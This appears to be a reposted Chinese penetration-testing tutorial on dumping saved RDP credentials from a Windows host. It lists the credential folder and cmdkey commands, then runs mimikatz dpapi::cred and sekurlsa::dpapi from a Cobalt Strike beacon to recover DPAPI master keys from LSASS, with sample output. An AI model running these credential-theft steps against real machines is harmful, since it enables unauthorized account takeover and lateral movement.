专栏首页HACK学习内网渗透 | 获取远程主机保存的RDP凭据密码

内网渗透 | 获取远程主机保存的RDP凭据密码

简单记录下获取远程主机RDP凭据。

Windows保存RDP凭据的目录是:

C:\Users\用户名\AppData\Local\Microsoft\Credentials

可通过命令行获取,执行:

cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。

使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

输出应类似

**BLOB**
  dwVersion : 00000001 - 1
  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
  dwFlags : 20000000 - 536870912 (system ; )
  dwDescriptionLen : 00000012 - 18
  szDescription : 本地凭据数据

  algCrypt : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen : 00000100 - 256
  dwSaltLen : 00000020 - 32
  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
  dwHmacKeyLen : 00000000 - 0
  pbHmackKey :
  algHash : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen : 00000200 - 512
  dwHmac2KeyLen : 00000020 - 32
  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
  dwDataLen : 000000c0 - 192
  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
  dwSignLen : 00000040 - 64
  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

需要关注的是guidMasterKey、pbData,pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。这里LSASS已经在其缓存中存有这个key因此我们可以使用SeDebugPrivilege获取。

beacon> mimikatz !sekurlsa::dpapi
mimikatz !sekurlsa::dpapi

     [00000001]
     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
     * Time : 2020/1/3 8:05:02
     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
     [00000002]
     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
     * Time : 2020/1/3 8:05:02
     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

然后将凭据保存到本地,执行

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"

原创作者: Sp4ce

参考来源: Sp4ce's Blog

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:Sp4ce's Blog

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 干货 | 常见WAF拦截页面总结

    去年年底看到@madcoding老哥博客的“Waf的识别与绕过”一文中搜集了不少WAF拦截页面,正好我平时也有搜集WAF拦截页面的习惯,所以结合他的一起整理成了...

    HACK学习
  • 2018-2019年 | K8工具集合

    zzz_exploit.exe 192.11.22.82 zzz_exploit.exe 192.11.22.82 exe参数 zzz_exploit.exe ...

    HACK学习
  • 火眼Windows渗透测试平台-commando Vmware版

    Kali Linux 已成为攻击型安全专家的标配工具,但对需要原生Windows功能的渗透测试员来说,维护良好的类似工具集却是不存在的

    HACK学习
  • 函数 | Python内置函数详解—数学运算类

    Python内置的函数及其用法。为了方便记忆,已经有很多开发者将这些内置函数进行了如下分类:

    潘永斌
  • 9块钱从购买域名到签发SSL证书

    我们在日常工作中,经常可能会部署一些网站或者执行一些测试工作,无论是公网还是内网环境,都可能需要一些正规机构签发的SSL证书,本教程将会详细描述,如何使用9块钱...

    测试邦
  • 自定义转场详解(一)

    Scott_Mr
  • 被疯抢的茅台和一地鸡毛的A股

    今天看到一则新闻《茅台促销引发抢购 警察鸣枪示警》,上网搜了一下,原来是茅台公司发布文件称,将开展夏季消费者优惠活动——原指导价格为1499元的53度500ml...

    金融民工小曾
  • k8s使用Init Container确保依赖服务已启动

    在K8S使用过程中,我们在启动服务过程中,可能会存在服务依赖启动的问题。比如:我们希望先启动MySQL服务,再启动Nginx服务。此时可以使用initConta...

    咻咻ing
  • [一对一课程] 之 设计并实现第一个JS模块?

    这篇文章不太好写,谈目前网上的多数教程,谈到JS模块必贴代码,而我一向不喜欢在公众号文章里写代码,因为难以阅读。所以我尝试从“构思”的角度,来写一下本文。 在昨...

    web前端教室
  • 使用pygame开发合金弹头(5)

    Python的强大超出你的认知,Python的功能不止于可以做网络爬虫,数据分析,Python完全可以进行后端开发,AI,Python也可进行游戏开发,本文将会...

    疯狂软件李刚

扫码关注云+社区

领取腾讯云代金券